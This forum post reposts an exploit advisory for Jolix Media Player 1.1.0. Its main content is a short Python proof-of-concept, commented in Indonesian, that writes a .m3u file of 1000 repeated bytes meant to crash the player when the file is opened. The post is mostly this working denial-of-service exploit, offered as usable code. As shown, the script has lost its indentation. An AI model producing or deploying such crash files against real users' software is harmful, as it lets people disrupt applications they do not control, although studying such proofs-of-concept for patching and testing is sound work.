Jump to content
Matt

Jolix Media Player 1.1.0 Denial Of Service

Recommended Posts

Posted

Description : Jolix Media Player version 1.1.0 suffers from a denial of service vulnerability.

Author : IndonesiaGokilTeam

Source : Jolix Media Player 1.1.0 Denial Of Service ? Packet Storm

Code :

#!/usr/bin/python
print """
[+]Judul Ledakan:Jolix Media Player (.m3u) Denial of Service Exploit
[+]Celah versi: Version 1.1.0
[+]Mengunduh produk: [url]http://www.jolixtools.com/downloads/jolix-media-player-setup.exe[/url]
[+]Hari Tanggal Tahun: 09.07.2013
[+]Penulis: IndonesiaGokilTeam
[+]Dicoba di sistem operasi: Windows xp sp 3
"""

sampah = "\x41" * 1000
ledakan = sampah

try:
rst= open("SampahMasyarakat.m3u",'w')
rst.write(ledakan)
rst.close()
print("\nFile Sampah Masyarakat dibuat !\n")
except:
print "Gagal"

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...